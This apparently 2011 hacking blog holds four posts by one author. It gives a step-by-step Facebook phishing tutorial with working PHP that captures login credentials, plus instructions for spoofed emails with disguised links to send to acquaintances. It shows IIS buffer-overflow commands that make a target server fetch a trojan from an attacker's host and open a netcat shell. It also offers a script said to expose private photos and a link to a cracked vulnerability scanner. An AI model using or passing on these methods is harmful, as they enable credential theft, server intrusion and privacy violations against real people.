Wednesday, May 25, 2011

Hacking Facebook Account Passwords

Every Body Question About how can i  hackfacebook? why doesn't my phisher work? how can i send my phisher?...
This is a step by step tutorial for face-book accounts.
...ONE...
Go to www.facebook.com/login.php 
and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.
TWO...
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press
ctrl+f and search "action=" without the quotes. you should find this 

The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html

THREE...
Now that we changed the action to
next.php, we should also make a "next.php". open up notepad again. And write this...

Quote
header("Location: http://www.facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Save this as "
next.php"

Note: for security you should rename "
passwords.txt" to something else.
now make a text file called "
passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank...

FOUR...
Upload the 3 files  to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com justfree.com or 007sites.com. When you made an account you should upload the 3 files...

FIVE...
now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six...
SIX...
Copy the content of an original Facebook friendship invitation email and paste it into a new mail
DONT SENT YET!
remove the hyperlink from this link:
http:/www.facebook.com/n/?reqs.php
Mark it and push the
Add hyperlink button





Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty Good Now i believe you are ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it... 

Regards 
tanzeel ahad

Monday, May 9, 2011

Hacking Web Servers


Hacking Tool: IISHack.exe


iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed.
c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on, www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.
"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions. A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes the ISM.DLL to handle the request. Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed.
A sample exploit can be constructed as shown below:
To hack the target site and attacker's system running a web server can use iishack.exe and ncx.exe.
To begin with, the ncx.exe is configured to run from the root directory. IIShack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe 
The attacker can then use netcat to evoke the command shell
c:\>nc  80 
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.


IPP Buffer Overflow Countermeasures


  • Install latest service pack from Microsoft.
  • Remove IPP printing from IIS Server
  • Install firewall and remove unused extensions
  • Implement aggressive network egress filtering
  • Use IISLockdown and URLScan utilities
  • Regularly scan your network for vulnerable servers
Without any further explanation, the first countermeasure is obviously to install the latest service packs and hotfixes.
As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types. This particular ISAPI filter resides in C: \WINNT\System32\msw3prt.dll and provides Windows 2000 with support for the IPP. If this functionality is not required on the Web server, the application mapping for this DLL to .printer files can be removed (and optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited. This is possible because the DLL will not be loaded into the IIS process when it starts up. In fact, most security issues are centered on the ISAPI DLL mappings, making this one of the most important countermeasure to be adopted when securing IIS.
Another standard countermeasure that can be adopted here is to use a firewall and remove any extensions that are not required. Implementing aggressive network egress can help to a certain degree.
With IIS, using IISLockdown and URLScan - (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected.
Microsoft has also released a patch for the buffer overflow, but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found with the code.


ISAPI DLL Source disclosures


  • Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be in accessible.
  • This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc) file.
  • appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.
IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. Vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords.
HTR files are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions. HTR is a first-generation advanced scripting technology that is included in IIS 3.0, and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superceded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods
Exploit / Attack Methodology
By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represents spaces) and then appending " .htr " this tricks IIS into thinking that the client is requesting a " .htr " file . The .htr file extension is mapped to the ISM.DLL ISAPI Application and IIS redirects all requests for .htr resources to this DLL.
ISM.DLL is then passed the name of the file to open and execute but before doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and a few spaces and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service started and stopped. It will only work when ISM.DLL first loaded into memory.
"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.
If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.
The second threat would be more difficult to exploit. A carefully-constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.
".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.
The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.
Regards.
Tanzeel Ahad

See Hidden Facebook Pictures

Follow these steps :-

1. Go to the Profile-page of the Person.
2. Clear your Address line
3. Copy this into:



Code:
javascript:(function(){CSS.removeClass(document.body,%20'profile_two_columns')
;tab_controller.changePage("photos");})()



4. Now you can easily see Pictures of s.b. you don't even know.

Regards.
Tanzeel Ahad

Hack about 80% of every website out there

All right,
You kids need to stop asking for someone else to hack your "friends" forum, your girlfriends myspace page, etc.

You want to learn to hack, stop asking stupid questions.

There is ONE tool, that was created originally to protect from hackers. Unfortunately, it's one of the best friends a hacker will ever have :

It's called Acunetix.

Acunetix is a tool that scans websites for known vulnerabilities. It will list all possible sql, xss, html injections, all java injections, all passwords and database weaknesses, all ftp weaknesses, etc. All form submissions exploits that the website can be targeted with. Remote upload and download vulnerabilities.

It will work in 80% of the cases, its database is updated regularly, but websites with latest updates and a good admin might not be targetable.

So here's the thing. Before you post anymore questions such as : "Can this website be hacked ?" or "How do I hack this forum ?", download Acunetix in the link below (I couldn't be bothered uploading a new one).

DOWNLOAD :Acunetix Full Version HERE
PASSWORD : hf.net
(Uploaded by me, 100% clean)

Simply install it and copy the crack folder content into your Acunetix folder (replace files), and when you start the program, click on New Scan, follow the steps.

It will answer most of your questions. Take any known website, scan them and you'll find lots of little "medium risk" security problems etc. The program will explain what the potential harms are, not how to do them. The rest is up to you, do a bit of research, learn by yourself.

So use Acunetix, and stop asking stupid things that just make people think you have a pea for a brain.

Oh, and last tip : http://www.google.com is your friend. Don't forget it before you ask anything else.
Regards
Tanzeel Ahad